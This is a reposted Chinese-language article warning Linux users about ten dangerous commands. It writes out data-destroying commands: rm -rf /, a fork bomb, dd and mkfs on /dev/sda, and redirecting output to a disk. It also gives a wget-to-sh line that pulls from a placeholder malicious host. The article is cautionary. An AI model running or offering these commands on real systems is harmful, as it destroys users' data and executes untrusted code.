Linux中最危險的10個指令及其風險評估
- 王林轉載
- 2024-01-01 09:25:40483瀏覽
Linux命令列佷有用、很高效,也很有趣,但有時候也很危險,尤其是在你不確定你自己在做什麼時候。
這篇文章將會向你介紹十條指令,但你最好不要嘗試著去使用。
當然,以下指令通常都是在root權限下才能將愚蠢發揮到無可救藥;在一般使用者身分下,破壞的只是自己的一畝三分地。
1. rm -rf 指令
#rm -rf指令是刪除資料夾及其內容最快的方式之一。
僅僅一丁點的敲錯或無知都可能導致不可恢復的系統崩潰。
下列是一些rm 指令的選項:
1.rm指令在Linux下通常用來刪除檔案。
2.rm -r 指令遞歸的刪除資料夾,甚至是空的資料夾。
3.rm -f 指令能不經過詢問直接刪除『只讀檔案』。 Linux下刪除檔案並不在乎該檔案是否是唯讀的,而只是在意其父目錄是否有寫入權限。所以,-f這個參數只是表示不必一個個刪除確認,而是一律悄悄刪除。另外,原始的rm指令其實也是沒有刪除提示的,只是一般的發行版都會將rm透過別名的方式增加-i參數來要求刪除確認,而-f則抑制了這個提示。
4.rm -rf / : 強制刪除根目錄下所有東東。
5.rm -rf *:強制刪除目前目錄的所有檔案。
6.rm -rf . : 強制刪除目前資料夾及其子資料夾。
從現在起,當你要執行rm -rf指令時請留心一點。我們可以在「.bashrc」檔案中對‘rm‘指令建立rm -i的別名,來預防用 ‘rm‘指令刪除檔案時的事故,它會要求你確認每一個刪除要求。 (譯註:大多數發行版已經這樣做了,如果還沒有,請這樣做,並在使用-f參數前一定考慮好你在做什麼!譯者本人有著血淚的教訓啊。)
2. :{:|:&};: 指令
#這就是個fork 炸彈的實例。
具體操作是透過定義一個名為 ‘:‘的函數,它會呼叫自己兩次,一次在前台另一次運行在後台。它會反覆的執行下去直到系統崩潰。
3. 指令> /dev/sda
#這個指令會將某個‘指令‘的輸出寫到區塊裝置/dev/sda中。
該操作會將在區塊裝置中的所有資料區塊替換為命令寫入的原始數據,導致整個區塊裝置的資料遺失。
4. mv 資料夾 /dev/null
#這個指令會移動某個‘資料夾‘到/dev/null。
在Linux中 /dev/null 或 null 設備是一個特殊的文件,所有寫入它的資料都會被清除,然後返回寫入操作成功。
當然,要說明的是這個指令並不能阻止資料復原軟體-所以,真正的徹底毀滅,需要採用專用的軟體或手法來完成。
5. wget http://malicious_source -O- | sh
#該指令會從一個(也許是)惡意來源下載一個腳本並執行。
Wget指令會下載這個腳本,而sh會(無條件的)執行下載下來的腳本。
注意: 你應該隨時注意你下載套件或腳本的來源。只能使用那些從可信任的來源下載腳本/程式。
6. mkfs.ext3 /dev/sda
#上列指令會格式化區塊裝置‘sda’,在執行這個指令後你的區塊裝置(硬碟)會被格式化,直接讓你的系統達到不可復原的階段。
通常我們不會直接使用/dev/sda這樣的設備,除非是作為raw設備使用。
一般都需要將sda分成類似sda1、sda2這樣的分割區後才使用。當然,無論你使用sda或sda1,這樣對區塊裝置或分割區進行mkfs都是毀滅性的,上面的資料都會被蒸發了。
7. > file
#這個指令常用來清空檔案內容或記錄指令輸出。
不過請在執行前,確認輸出的檔案是空的或還不存在,否則原來的檔案可真是恢復不了——連資料復原軟體都未必能幫助你了。
你可能真正想用的是“>>”,即累加新的輸出到文件,而不是刷新那個文件。
如果用上列執行時輸入錯誤或無知的輸入類似 “> xt.conf”的命令會覆蓋設定檔或其他任何的系統設定檔。
8. ^foo^bar
#這個指令用來編輯先前執行的指令而無需重打整個指令。
用foobar命令時如果你沒有徹底檢查改變原始命令的風險,這可能導致真正的麻煩。
9. dd if=/dev/random of=/dev/sda
#這個指令會向區塊設備sda寫入隨機的垃圾檔案從而擦出數據,讓你的系統可能陷入混亂和不可恢復的狀態。
記得上面說過mv到黑洞並不能徹底刪除資料麼?那麼這個指令就是給了你一個徹底刪除的方法!當然為了保險起見,你可以覆寫多次。
10. 隱藏指令
#下面的指令其實就是上面第一個指令 (rm -rf)。
這裡的程式碼是隱藏在十六進制裡的,一個無知的用戶可能就會被愚弄,如果在終端裡運行下面命令可能會擦除你的根分區。
真正的危險是隱藏起來的,不會被輕易的偵測到。你必須時時留心你在做什麼結果會如何。
切記,千萬不要編譯/運行從未知來源的程式碼。
#今天帶給大家的是個指令到這裡就結束了啦,請千萬記住不要再伺服器或其他裝置上隨意嘗試~
如果你想測試它們,請在虛擬機器上運行,不然檔案遺失或系統奔潰就不好了。
以上是Linux中最危險的10個指令及其風險評估的詳細內容。更多資訊請關注PHP中文網其他相關文章!